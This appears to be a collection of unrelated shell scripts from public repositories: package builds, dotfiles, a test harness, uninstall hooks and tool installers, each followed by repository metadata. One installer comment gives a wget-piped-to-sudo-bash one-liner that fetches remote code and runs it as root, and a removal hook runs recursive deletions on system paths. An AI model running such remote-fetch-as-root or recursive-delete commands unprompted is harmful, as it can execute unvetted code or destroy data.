cp -a "${_pkgname}" "${_pkgname}-py2"
cd "${_pkgname}"
sed -e "s|#![ ]*/usr/bin/python$|#!/usr/bin/python2|" \
-e "s|#![ ]*/usr/bin/env python$|#!/usr/bin/env python2|" \
-e "s|#![ ]*/bin/env python$|#!/usr/bin/env python2|" \
-i $(find . -name '*.py')
}
build() {
msg "Building Python 2"
cd "$srcdir/${_pkgname}-py2"
python2 setup.py build
msg "Building Python 3"
cd "$srcdir/${_pkgname}"
python setup.py build
}
package_python2-keras-git() {
depends=('python2' 'python2-numpy' 'python2-scipy' 'python2-theano' 'python2-h5py')
provides=('python2-keras')
conflicts=('python2-keras')
cd "$srcdir/${_pkgname}-py2"
python2 setup.py install --root="$pkgdir"/ --optimize=1
}
package_python-keras-git() {
depends=('python' 'python-numpy' 'python-scipy' 'python-theano' 'python-h5py')
provides=('python-keras')
conflicts=('python-keras')
cd "$srcdir/${_pkgname}"
python setup.py install --root="$pkgdir"/ --optimize=1
}
# vim:set ts=2 sw=2 et:
| true
|
f966be0e7e8e3d780d3aaf54c63d5059749a6b53
|
Shell
|
rcelha/flask-desk
|
/scripts/build_image
|
UTF-8
| 273
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/sh
set -ex;
image_name=rcelha/flask_desk_application
container_name=rcelha_flask_desk_application_run
echo Build docker image;
docker-compose -f docker-compose.prod.yml stop
docker-compose -f docker-compose.prod.yml rm --force app
docker build -t ${image_name} .
| true
|
9bc0de9a2d83ba3c8b03bc9a41fe4f32ac6dbaff
|
Shell
|
suDisdain/dotfiles
|
/.local/bin/shortcuts
|
UTF-8
| 446
| 3.359375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Output locations. Unactivated progs should go to /dev/null.
shell_shortcuts="${XDG_CONFIG_HOME:-$HOME/.config}/shortcutrc"
# Remove, prepare files
printf "# vim: filetype=sh\\nalias " > "$shell_shortcuts"
# Format the `files` file in the correct syntax and sent it to both configs.
sed "s/\s*#.*$//;/^\s*$/d" "${XDG_CONFIG_HOME:-$HOME/.config}/files" | tee >(awk '{print $1"=\"$EDITOR "$2"\" \\"}' >> "$shell_shortcuts")
| true
|
9e03521cf28d1359ba1470ad464d2ac4b8d7db3c
|
Shell
|
uniquehash/C
|
/piscine/day12/ex00/tests/test5.sh
|
UTF-8
| 578
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/zsh
TMPDIRNAME=$(mktemp -d)
BINARYNAME=$RANDOM
trap "rm -rf $TMPDIRNAME" EXIT
cd ..
make all || exit 1
cp ft_display_file $TMPDIRNAME/$BINARYNAME
cd $TMPDIRNAME
YELLOW=$(printf "\e[33;1m")
GREEN=$(printf "\e[32;1m")
RED=$(printf "\e[31;1m")
RESET=$(printf "\e[m")
mkdir dir
printf "" > input
printf "" > expect.out
printf "Too many arguments.\n" > expect.err
CMD="./$BINARYNAME dir"
echo $CMD
echo ${YELLOW}Test:${RESET} Program terminates when faced with error
trap "echo ${RED}Diff [KO]$RESET" INT
$CMD >user.out 2>user.err <input
echo "${GREEN}Check [OK]$RESET"
| true
|
cdbcc97e3d6ae3605d033539b827a0f53c820b0e
|
Shell
|
mattrayner/Notes
|
/backups/.bash_profile
|
UTF-8
| 1,748
| 2.75
| 3
|
[] |
no_license
|
alias ll="ls -lahG"
[[ -s "$HOME/.profile" ]] && source "$HOME/.profile" # Load the default .profile
[[ -s "$HOME/.bash_prompt" ]] && source "$HOME/.bash_prompt" # Load our custom bash prompt
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
[[ -s ~/.bashrc ]] && source ~/.bashrc
##
# Your previous /Users/matthew.rayner/.bash_profile file was backed up as /Users/matthew.rayner/.bash_profile.macports-saved_2014-01-15_at_14:28:47
##
# MacPorts Installer addition on 2014-01-15_at_14:28:47: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
##
# Your previous /Users/matt/.bash_profile file was backed up as /Users/matt/.bash_profile.macports-saved_2014-03-02_at_23:16:28
##
# MacPorts Installer addition on 2014-03-02_at_23:16:28: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
##
# Your previous /Users/matthewrayner/.bash_profile file was backed up as /Users/matthewrayner/.bash_profile.macports-saved_2014-03-20_at_17:23:21
##
# MacPorts Installer addition on 2014-03-20_at_17:23:21: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
MYSQL=/usr/local/mysql/bin
export PATH=$PATH:$MYSQL
export DYLD_LIBRARY_PATH=/usr/local/mysql/lib:$DYLD_LIBRARY_PATH
export JAVA_HOME='/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home'
export PATH=$PATH:$JAVA_HOME
| true
|
6701144a9fd4dbd8d9513e04e9649ba4be3d9b14
|
Shell
|
zichaotong/Computation_using_CPP
|
/vector_read/vector_read_prb.sh
|
UTF-8
| 599
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
#
g++ -c -g -I/$HOME/include vector_read_prb.cpp >& compiler.txt
if [ $? -ne 0 ]; then
echo "Errors compiling vector_read_prb.cpp"
exit
fi
rm compiler.txt
#
g++ vector_read_prb.o /$HOME/libcpp/$ARCH/vector_read.o -lm
if [ $? -ne 0 ]; then
echo "Errors linking and loading vector_read_prb.o."
exit
fi
#
rm vector_read_prb.o
#
mv a.out vector_read_prb
./vector_read_prb < vector_read_prb_input.txt > vector_read_prb_output.txt
if [ $? -ne 0 ]; then
echo "Errors running vector_read_prb."
exit
fi
rm vector_read_prb
#
echo "Program output written to vector_read_prb_output.txt"
| true
|
afeb86c1b772ce2213acdfd7b19752832e43f489
|
Shell
|
sayan2407/BridgeLabz-All-Program
|
/Day6_14.sh
|
UTF-8
| 250
| 3.34375
| 3
|
[] |
no_license
|
#! /usr/bin/bash -x
read -p "Enter N : " n
for (( i=2 ; i<=$n ;i++ ))
do
b=0
for (( j=2 ; j<=$(( i/2 )) ;j++ ))
do
if [ $(( i % j )) -eq 0 ]
then
b=1
break
fi
done
if [ $b -eq 0 ]
then
echo -n "$i "
fi
done
| true
|
b792891dbc62144826720050e402ba50d2743e17
|
Shell
|
gayoso/SistemasOperativos
|
/grupo09/Arrancar.sh
|
UTF-8
| 1,947
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
source AFRAINfunc.sh
ARRANCAR="Arrancar"
CALLER="$2"
cantParametros="$#"
function loguearErrorOEcho {
if [[ "$cantParametros" -eq 1 ]]; then
echo "[ERROR] $1"
else
logEchoError "$CALLER" "Arrancar.sh: $1"
fi
}
function loguearInfoOEcho {
if [[ "$cantParametros" -eq 1 ]]; then
echo "[INFO] $1"
else
logEchoInfo "$CALLER" "Arrancar.sh: $1"
fi
}
if [[ "$ENTORNO_CONFIGURADO" != true ]]; then
# No logueo porque no existen las variables de ambiente
echo "[ERROR] El entorno no ha sido configurado aún. Corra el script AFRAINIC.sh para configurarlo."
exit 1
fi
if [[ "$cantParametros" -ne 1 && "$cantParametros" -ne 2 ]]; then
loguearErrorOEcho "La cantidad de parametros recibida no es correcta."
exit 1
fi
script_name="$1"
if [[ "$script_name" != "AFRARECI.sh" ]] && [[ "$script_name" != "AFRAUMBR.sh" ]] && [[ "$script_name" != "AFRALIST.pl" ]]; then
loguearErrorOEcho "Este comando sirve para arrancar solo a AFRARECI.sh, AFRAUMBR.sh o AFRALIST.pl."
exit 1
fi
script_pid=$(pgrep "$script_name")
if [[ $(wc -w <<< "$script_pid") != 0 ]]; then
loguearErrorOEcho "El script indicado ($script_name) ya esta corriendo y no puede arrancarse nuevamente."
exit 1
fi
afralist_pid=$(ps -ef | grep "perl AFRALIST.pl" | grep -v "grep")
if [[ "$afralist_pid" != "" ]]; then
loguearErrorOEcho "El script indicado ($script_name) ya esta corriendo y no puede arrancarse nuevamente."
exit 1
fi
if [[ "$script_name" == "AFRARECI.sh" ]]; then
./"$script_name" &
afrareciPID=$(pgrep AFRARECI.sh)
loguearInfoOEcho "Arrancando el script 'AFRARECI.sh' bajo el PID: $afrareciPID"
exit 0
fi
if [[ "$script_name" == "AFRAUMBR.sh" ]]; then
./"$script_name" &
afraumbrPID=$(pgrep AFRAUMBR.sh)
loguearInfoOEcho "Arrancando el script 'AFRAUMBR.sh' bajo el PID: $afraumbrPID"
exit 0
fi
if [[ "$script_name" == "AFRALIST.pl" ]]; then
loguearInfoOEcho "Arrancando el script 'AFRALIST.pl'"
perl "$script_name"
exit 0
fi
| true
|
35cd8349d1d7575cf672d5e4aaae7ebd5b689dec
|
Shell
|
aheimsbakk/notes
|
/install-powerline-go.sh
|
UTF-8
| 1,741
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Install or reinstall powerline in /etc/profile.d.
#
# wget -O - https://raw.githubusercontent.com/aheimsbakk/notes/master/install-powerline.sh | sudo bash
#
BASE_URL=https://raw.githubusercontent.com/aheimsbakk/notes/master
. /etc/os-release
rm -f /usr/local/bin/powerline-go
if [ "$(uname -m)" = "armv7l" ]; then
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-arm
elif [ "$(uname -m)" = "aarch64" ]; then
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-arm64
else
wget -q -nc -O /usr/local/bin/powerline-go https://github.com/justjanne/powerline-go/releases/download/v1.22.1/powerline-go-linux-amd64
fi
chmod +x /usr/local/bin/powerline-go
case "$ID" in
debian | raspbian | ubuntu)
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get -y install python3-pip git tmux vim-nox wget fonts-powerline
;;
fedora)
dnf -y install python3-pip git tmux vim wget
;;
rhel | centos)
yum -y install python3-pip git tmux vim wget
;;
*)
echo Unknown OS.
exit 1
;;
esac
rm -f /etc/profile.d/powerline-zgo.sh /etc/profile.d/powerline-other.sh /etc/profile.d/z-powerline-go.sh /etc/profile.d/powerline.sh /etc/profile.d/zzz-powerline.sh
wget -q -nc -O /etc/profile.d/z-powerline-go.sh $BASE_URL/powerline-zgo.sh
wget -q -nc -O /etc/profile.d/powerline-other.sh $BASE_URL/powerline-other.sh
echo
echo "Log out and in again to activate powerline-go."
echo "Or source the configuration in the current shell:"
echo
echo " source /etc/profile.d/powerline-other.sh"
echo " source /etc/profile.d/z-powerline-go.sh"
echo
| true
|
3b95bb646cab55ceab23ecd825d1af6efa2f6681
|
Shell
|
AndreiGolovatskii/sportprog
|
/lksh2018&POST/2018-july-A-small-archive/courses/examples/array.sh
|
UTF-8
| 252
| 2.59375
| 3
|
[] |
no_license
|
sols[0]="solutions/forbidden_basic_ra"
scores[0]=10
sols[1]="solutions/forbidden_mp_greedy"
scores[1]=50
# $1, $2, .... $*
echo ${sols[1]}
echo We have ${#sols[*]} solutions,
echo scores = ${scores[*]}
# f=a b c d
# for solution in f ; do
# done
| true
|
d38a113d8d9eab4f467f482ca7e47105fc2f1805
|
Shell
|
millenito/dotfiles
|
/.zshrc
|
UTF-8
| 12,795
| 3.015625
| 3
|
[] |
no_license
|
# load zgen
source "${HOME}/.zgen/zgen.zsh"
# if the init scipt doesn't exist
if ! zgen saved; then
echo "Creating a zgen save"
zgen oh-my-zsh
# plugins
zgen oh-my-zsh plugins/git
zgen oh-my-zsh plugins/command-not-found
zgen oh-my-zsh plugins/vi-mode
zgen oh-my-zsh plugins/colored-man-pages
# zgen load zpm-zsh/colors
zgen load zdharma/fast-syntax-highlighting
zgen load zsh-users/zsh-autosuggestions
# bulk load
# zgen loadall <<EOPLUGINS
# zsh-users/zsh-history-substring-search
# /path/to/local/plugin
# EOPLUGINS
# ^ can't indent this EOPLUGINS
# completions
zgen load zsh-users/zsh-completions src
zgen load docker/cli contrib/completion/zsh
# theme
# zgen oh-my-zsh themes/avit
# zgen oh-my-zsh themes/steeef
# zgen oh-my-zsh themes/ys
# zgen load marszall87/nodeys-zsh-theme nodeys
zgen load denysdovhan/spaceship-prompt spaceship
zgen load mafredri/zsh-async
# zgen load sindresorhus/pure
# zgen load geometry-zsh/geometry
# save all to init script
zgen save
fi
ZGEN_RESET_ON_CHANGE=(${HOME}/.zshrc ${HOME}/.zshrc.local)
set -o ignoreeof # xfce terminal
setopt auto_list # automatically list choices on ambiguous completion
setopt auto_menu # automatically use menu completion
setopt always_to_end # move cursor to end if word had one match
setopt hist_ignore_all_dups # remove older duplicate entries from history
setopt hist_reduce_blanks # remove superfluous blanks from history items
setopt share_history # share history between different instances
setopt correct_all # autocorrect commands
# auto ls after cd with exa
autoload -U add-zsh-hook
autoload -U colors && colors
add-zsh-hook -Uz chpwd (){
# if type exa > /dev/null 2>&1; then
# exa --group-directories-first
# exa
if type lsd > /dev/null 2>&1; then
lsd --group-dirs first
else
ls
fi
}
# Enable autocompletions
autoload -Uz compinit
typeset -i updated_at=$(date +'%j' -r ~/.zcompdump 2>/dev/null || stat -f '%Sm' -t '%j' ~/.zcompdump 2>/dev/null)
if [ $(date +'%j') != $updated_at ]; then
compinit -i
else
compinit -C -i
fi
zmodload -i zsh/complist
# Save history so we get auto suggestions
HISTFILE=$HOME/.zsh_history
HISTSIZE=100000
SAVEHIST=$HISTSIZE
# use the vi navigation keys in menu completion
zstyle ':completion:*' menu select
zmodload zsh/complist
bindkey -M menuselect 'h' vi-backward-char
bindkey -M menuselect 'k' vi-up-line-or-history
bindkey -M menuselect 'l' vi-forward-char
bindkey -M menuselect 'j' vi-down-line-or-history
# vi mode zsh
bindkey -v
# GNU Readline bindings
bindkey "\C-u" vi-kill-line
bindkey "\C-k" vi-kill-eol
bindkey "\C-f" vi-forward-char
bindkey "\C-b" vi-backward-char
bindkey "^[f" vi-forward-word
bindkey "^[b" vi-backward-word
bindkey '^[[Z' undo # Shift+tab undo last action
# 10ms for key sequences
KEYTIMEOUT=1
export ZSH_AUTOSUGGEST_BUFFER_MAX_SIZE=20
export ZSH_AUTOSUGGEST_USE_ASYNC=1
# Spaceship prompt
SPACESHIP_GIT_LAST_COMMIT_SHOW="${SPACESHIP_GIT_LAST_COMMIT_SHOW=true}"
SPACESHIP_GIT_LAST_COMMIT_SYMBOL="${SPACESHIP_GIT_LAST_COMMIT_SYMBOL=""}"
SPACESHIP_GIT_LAST_COMMIT_PREFIX="${SPACESHIP_GIT_LAST_COMMIT_PREFIX=""}"
SPACESHIP_GIT_LAST_COMMIT_SUFFIX="${SPACESHIP_GIT_LAST_COMMIT_SUFFIX=""}"
SPACESHIP_GIT_LAST_COMMIT_COLOR="${SPACESHIP_GIT_LAST_COMMIT_COLOR="magenta"}"
spaceship_git_last_commit() {
[[ $SPACESHIP_GIT_LAST_COMMIT_SHOW == false ]] && return
spaceship::is_git || return
local 'git_last_commit_status'
# git_last_commit_status=$(git log --pretty='format:%<(25,trunc)%s 🕑 %cr' 'HEAD^..HEAD' | head -n 1)
# git_last_commit_status=$(git log --pretty='format:🕑 %cr %s' | head -n 1)
git_last_commit_status=$(git log --pretty='format:🕑 %cr | %<(30,trunc)%s' | head -n 1)
[[ -z $git_last_commit_status ]] && return
spaceship::section \
"$SPACESHIP_GIT_LAST_COMMIT_COLOR" \
"$SPACESHIP_GIT_LAST_COMMIT_PREFIX" \
"$SPACESHIP_GIT_LAST_COMMIT_SYMBOL$git_last_commit_status" \
"$SPACESHIP_GIT_LAST_COMMIT_SUFFIX"
}
SPACESHIP_PROMPT_ORDER=(
# time # Time stamps section
host # Hostname section
user # Username section
dir # Current directory section
docker # Docker section
# php # PHP section
git # Git section (git_branch + git_status)
git_last_commit
line_sep # Line break
battery # Battery level and status
jobs # Background jobs indicator
exit_code # Exit code section
exec_time # Execution time
char # Prompt character
)
SPACESHIP_RPROMPT_ORDER=( # Spaceship right prompt
vi_mode # Vi-mode indicator
)
SPACESHIP_CHAR_SYMBOL="❯"
SPACESHIP_CHAR_SUFFIX=" "
SPACESHIP_USER_COLOR="red"
SPACESHIP_USER_SHOW=always
SPACESHIP_HOST_SHOW=always
SPACESHIP_HOST_SHOW_FULL=true
SPACESHIP_HOST_COLOR="cyan"
SPACESHIP_USER_PREFIX="as "
SPACESHIP_DIR_COLOR="yellow"
SPACESHIP_PROMPT_FIRST_PREFIX_SHOW=true
SPACESHIP_BATTERY_THRESHOLD=20
# SPACESHIP_HOST_PREFIX="using "
SPACESHIP_VI_MODE_INSERT="-- INSERT --"
SPACESHIP_VI_MODE_NORMAL="[NORMAL]"
# pure prompt
autoload -U promptinit; promptinit
# change the path color
zstyle :prompt:pure:path color yellow
# Untuk merubah titlebar dari st terminal
# Sumber: http://www.faqs.org/docs/Linux-mini/Xterm-Title.html#s5
case $TERM in
st*)
DISABLE_AUTO_TITLE="true"
precmd () {
# menampilkan direktori aktif (kondisi default)
print -Pn "\e]0;st: %~\a"
}
preexec () {
# menampilkan program yang sedang berjalan
print -Pn "\e]0;st:$1\a"
}
;;
*)
DISABLE_AUTO_TITLE="false" ;;
esac
# Random man page everytime a terminal opens
# man $(find /usr/share/man/man1 -type f | shuf | head -1) | head -25
# # Change cursor shape for different vi modes.
# function zle-keymap-select {
# if [[ ${KEYMAP} == vicmd ]] ||
# [[ $1 = 'block' ]]; then
# echo -ne '\e[1 q'
#
# elif [[ ${KEYMAP} == main ]] ||
# [[ ${KEYMAP} == viins ]] ||
# [[ ${KEYMAP} = '' ]] ||
# [[ $1 = 'beam' ]]; then
# echo -ne '\e[5 q'
# fi
# }
# zle -N zle-keymap-select
#
# # Use beam shape cursor on startup.
# echo -ne '\e[5 q'
#
# # Use beam shape cursor for each new prompt.
# zle-line-init() {
# zle -K viins # initiate `vi insert` as keymap (can be removed if `bindkey -V` has been set elsewhere)
# echo -ne "\e[5 q"
# }
alias pacman="sudo pacman"
alias s="ssh"
alias p="ping"
alias g="git"
alias trc="transmission-remote-cli"
alias lg="ls -l | grep"
alias lag="ls -al | grep"
# enable nvidia drivers
alias nvidia="sudo primusrun glxgears"
# startx from tty
alias sx="startx"
# nmcli wifi
alias nmlist="nmcli dev wifi list"
alias nmconn="nmcli dev wifi connect"
# set path go
#export GOROOT=/home/$USER/go/
#export GOPATH=/home/$USER/gopath/
#export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
# cd to environment
alias dot='cd "$DOTFILES"'
alias note='cd "$NOTES"'
alias kul='cd "$KULIAH"'
alias scr='cd "$SCRIPTS"'
alias qmk='cd "$QMK"'
alias qmk_make='make annepro2/c18; echo " Press LSHIFT + RSHIFT + B on Anne Pro 2 keyboard to enter IAP mode before flashing"'
alias qmk_flash="sudo ./annepro2_tools --boot annepro2_c18_millenito-annepro2-qmk.bin"
# Open ssh configs in editor
vssh(){
$EDITOR ~/.ssh/config
}
# localan php53 & php70
p5(){
cd "${P5}/$1"
}
p7(){
cd "${P7}/$1"
}
p8(){
cd "${P8}/$1"
}
njs(){
cd "${NJS}/$1"
}
compdef '_files -W $P5' p5
compdef '_files -W $P7' p7
compdef '_files -W $P8' p8
compdef '_files -W $NJS' njs
launchl(){
case "$(pwd)" in
*"$P5"*)
CURDIR=$(pwd | sed "s|"${P5}"||g")
[ ! $(docker ps | grep php53_apache) ] && docker start php53_apache
open -a "Google Chrome" "http://localhost:8085/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8085/${CURDIR}" >/dev/null 2>&1 & ;;
*"$P7"*)
CURDIR=$(pwd | sed "s|"${P7}"||g")
[ ! $(docker ps | grep php73_apache) ] && docker start php73_apache
open -a "Google Chrome" "http://localhost:8073/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8073/${CURDIR}" >/dev/null 2>&1 & ;;
# $BROWSER "http://localhost:8080/${CURDIR}" >/dev/null 2>&1 & ;;
esac
}
# start docker development server
alias ds5='docker start php53_apache'
alias ds7='docker start php73_apache'
# use neovim if available
if type nvim > /dev/null 2>&1; then
alias rvim='/usr/bin/vim' # real vim
alias v='nvim'
alias vi='nvim'
alias vim='nvim'
else
alias v='vim'
alias vi='vim'
fi
alias alacritty='WINIT_HIDPI_FACTOR=1.0 alacritty' # open alacritty normal size
if type exa > /dev/null 2>&1; then
alias ls='exa'
alias la='exa -a'
fi
alias cls='colorls'
# alias zaread='"$DOTFILES"/.i3/scripts/zaread' # read doc/docx/ppt/odf/ppt/pptx files with zathura (https://github.com/millenito/zaread)
# tmux
if type tmux > /dev/null 2>&1; then
alias tm='tmux'
alias tml='tmux ls'
tma(){ if [[ $# -eq 0 ]]; then tmux attach; else tmux attach -t "$1"; fi } # Attach to last tmux session or attach to named session
tmn(){ if [[ $# -eq 0 ]]; then tmux new-session; else tmux new-session -s "$1"; fi} # Create new unnamed session or use gived name
tmk(){ if [[ $# -eq 0 ]]; then tmux kill-server; else tmux kill-session -t "$1"; fi } # Kill all session or kill named session
fi
# fuzzy_cd_anywhere (cd kemanapun dengan fzf dengan parameter (ex: fcda anime))
function fcda() {
local file
file="$(locate -Ai -0 $@ | grep -z -vE '~$' | fzf --read0 -0 -1)"
if [[ -n $file ]]
then
if [[ -d $file ]]
then
cd -- $file | sed -e 's/[[:space:]]/\\ /g'
else
cd -- ${file:h}
fi
fi
}
# fuzzy_vim (Buka fzf dan otomatis buka file yg dipilih oleh fzf dengan vim)
fv() {
local files
IFS=$'\n' files=($(fzf-tmux --query="$1" --multi --select-1 --exit-0))
[[ -n "$files" ]] && ${EDITOR:-/usr/bin/vim} "${files[@]}"
}
# fuzzy_cd (buke fzf dan cd ke directory yang dipilih)
fcd() {
alias fzf_alt_c_command=$FZF_ALT_C_COMMAND
alias fzf_alt_c_opts=fzf $FZF_ALT_C_OPTS
local dir
dir="$( fzf_alt_c_command $@ | fzf_alt_c_opts)" || return
cd "$dir" || return
}
# git log with fzf and preview
fgl() {
local commits=$(
git log --graph --format="%C(yellow)%h%C(red)%d%C(reset) - %C(bold green)(%ar)%C(reset) %s %C(blue)<%an>%C(reset)" --color=always "$@" |
fzf --ansi --no-sort --height 100% \
--preview "echo {} | grep -o '[a-f0-9]\{7\}' | head -1 |
xargs -I@ sh -c 'git show --color=always @'"
)
if [[ -n $commits ]]; then
local hashes=$(printf "$commits" | cut -d' ' -f2 | tr '\n' ' ')
git show $hashes
fi
}
# Fuzzy script (cari script dengan fzf dan buka dengan editor)
fs() { du -aL $SCRIPTS "${PROJECTS}/learning/shell-script" | awk '{print $2}' | fzf | xargs -r $EDITOR ; }
# Fuzzy projects (cd ke folder projects2 dan buka session tmux baru bernama localhost)
fp()
{
if type fd > /dev/null 2>&1; then
cd $(fd --type d --follow --exclude '*.git*' . $PROJECTS | fzf)
else
cd $(find -L $PROJECTS -type d | fzf)
fi
[ -n $(type tmux > /dev/null 2>&1) ] && [ -z "$TMUX" ] && tmn projects
}
# # ex - archive extractor
# # usage: ex <file>
ex ()
{
NEWDIR=$(echo "$1" | sed 's/\.[^.]*$//')
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xvjf $1 -c $1 ;;
*.tar.gz) tar xzvf $1 -c $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xvf $1 -c $1 ;;
*.tbz2) tar xjf $1 -c $1 ;;
*.tgz) tar xvzf $1 -c $1 ;;
*.zip) mkdir "$NEWDIR" && unzip $1 -d "$NEWDIR" ;;
*.Z) uncompress $1;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via ex()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
alias gr='cd $(git rev-parse --show-toplevel)' # cd to git repo's root directory
# Commit & push
compush()
{
git commit -m "$*"
git push
}
# Commit & Push every changes
compushall()
{
echo "Staging every changes.."
git add .
echo "Preparing commit.."
git commit -a -m "$*"
echo "Pushing to remote.."
git push
}
alias fhi='__fzf_history__' # list history dengan fzf (key: Ctrl+r)
alias vf=fv # Alias kalau salah
# disable Ctrl+s freeze terminal
stty -ixon
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
| true
|
defeaa77e42153bf0d7e6ba571d37b5a355d811c
|
Shell
|
JoshMcguigan/estream
|
/install.sh
|
UTF-8
| 1,578
| 4.21875
| 4
|
[
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env sh
# This is slightly modified version of
# https://github.com/autozimu/LanguageClient-neovim/blob/next/install.sh
# Try install by
# - download binary
# - build with cargo
set -o nounset # error when referencing undefined variable
set -o errexit # exit when command fails
if [ "$#" -ne 1 ]
then
echo "Must pass version to script, like './install.sh v0.1.0'"
exit 1
fi
version=$1
name=estream
try_curl() {
command -v curl > /dev/null && \
curl --fail --location "$1" --output bin/$name
}
try_wget() {
command -v wget > /dev/null && \
wget --output-document=bin/$name "$1"
}
download() {
echo "Downloading bin/${name} ${version}..."
url=https://github.com/JoshMcguigan/estream/releases/download/$version/${1}
if (try_curl "$url" || try_wget "$url"); then
chmod a+x bin/$name
return
else
try_build || echo "Prebuilt binary might not be ready yet. Please check minutes later."
fi
}
try_build() {
if command -v cargo > /dev/null; then
echo "Trying build locally ${version} ..."
cargo install --path=. --force
else
return 1
fi
}
bin=bin/estream
if [ -f "$bin" ]; then
installed_version=$($bin --version)
case "${installed_version}" in
*${version}*) echo "Version is equal to ${version}, skipping install" ; exit 0 ;;
esac
fi
arch=$(uname -sm)
case "${arch}" in
"Linux x86_64") download linux-estream ;;
"Darwin x86_64") download macos-estream ;;
*) echo "No pre-built binary available for ${arch}."; try_build ;;
esac
| true
|
5ebcc0393b42193797a8a3e4a82620e7d05d42bb
|
Shell
|
chakralinux/desktop
|
/qucs/PKGBUILD
|
UTF-8
| 1,569
| 2.828125
| 3
|
[] |
no_license
|
# NOTE adms from github is broken
# remember to check for updates on https://software.opensuse.org/package/adms once in a while
pkgname=qucs
pkgver=0.0.19
pkgrel=1
pkgdesc="An integrated circuit simulator with a graphical user interface"
arch=('x86_64')
url="http://qucs.sourceforge.net"
license=('GPL')
depends=('gcc-libs' 'qt')
makedepends=('git' 'autoconf' 'automake' 'flex' 'bison' 'cmake' 'gperf')
optdepends=('freehdl: to permit digital circuit simulation'
'perl')
provides=('adms')
conflicts=('adms' 'adms-git')
source=("https://github.com/Qucs/qucs/archive/qucs-$pkgver.tar.gz"
"http://download.opensuse.org/repositories/openSUSE:/Leap:/42.2/standard/src/adms-2.3.4-4.3.src.rpm")
sha1sums=('28562fc5877e8c803fefa7be1d1ec578e4e62818'
'c8302d98903254c2d0c91a06830aecd72e1af582')
prepare() {
mkdir -p {build,fake_install}
tar -xf adms-2.3.4.tar.gz
}
build() {
# now adms must be build outsite qucs source tree
cd adms-2.3.4
cmake \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=RELEASE \
-DUSE_MAINTAINER_MODE=0
make DESTDIR="$srcdir/fake_install" install
cd $srcdir/build
cmake ../$pkgname-$pkgname-${pkgver} \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=RELEASE \
-DUSE_MAINTAINER_MODE=0 \
-DADMSXML_DIR=$srcdir/fake_install/usr/bin
make
}
package() {
cd $srcdir/build/$pkgname
make DESTDIR="$pkgdir" install
cd $srcdir/build/$pkgname-core
make DESTDIR="$pkgdir" install
# install adms executables
cd $srcdir/adms-2.3.4
make DESTDIR="$pkgdir" install
}
| true
|
de4913482b8120cf1f1467d1d347252bad3920d9
|
Shell
|
cedric-dufour/custom-conf
|
/generic/all/custom-conf-django-1.11/debian/prerm
|
UTF-8
| 277
| 2.765625
| 3
|
[
"CC-BY-4.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
[ "${1}" != 'purge' ] && exit 0
PKGNAME='custom-conf-django'
# Uninstall files
custom-conf-uninstall "${PKGNAME}" "/usr/share/${PKGNAME}/config" || exit 1
rm -rf /opt/django-1.11/* /etc/python/django /var/log/python/django /var/cache/python/django
# Exit
exit 0
| true
|
9e5bcf532b6d7d1cb0c2d49b62f520c9c1426fb7
|
Shell
|
jaknu/home
|
/grafana_entrypoint.sh
|
UTF-8
| 340
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e
/run.sh "$@" &
function addsource {
curl admin:admin@localhost:3000/api/datasources \
-H "Content-Type: application/json" \
--data-binary '{"name":"influxdb","type":"influxdb","access":"proxy","url":"http://influx:8086","isDefault":true,"database":"home"}'
}
until addsource; do
echo .
sleep 1
done
wait
| true
|
c173c949261db4d8afa99c7860a121f558ff55a1
|
Shell
|
Guardians-DSC/shell-scripts
|
/packages/cabal-install/install.sh
|
UTF-8
| 1,721
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/bash
#################################################################################################
# #
# Script de instalaçãocabal-install # #
# Autores: Ana Godoy - godoyisadora@gmail.com #
# Abril de 2017 #
# #
#################################################################################################
#Update
apt-get -y update
apt-get -y install gcc g++
apt-get install zlib1g-dev
#Install Cabal
apt-get -y install software-properties-common python-software-properties
yes ' ' |add-apt-repository -y ppa:hvr/ghc
apt-get -y update
apt-get install -y cabal-install-1.22 ghc-7.10.3
cat >> ~/.bashrc <<EOF
export PATH="\$HOME/.cabal/bin:/opt/cabal/1.22/bin:/opt/ghc/7.10.3/bin:\$PATH"
EOF
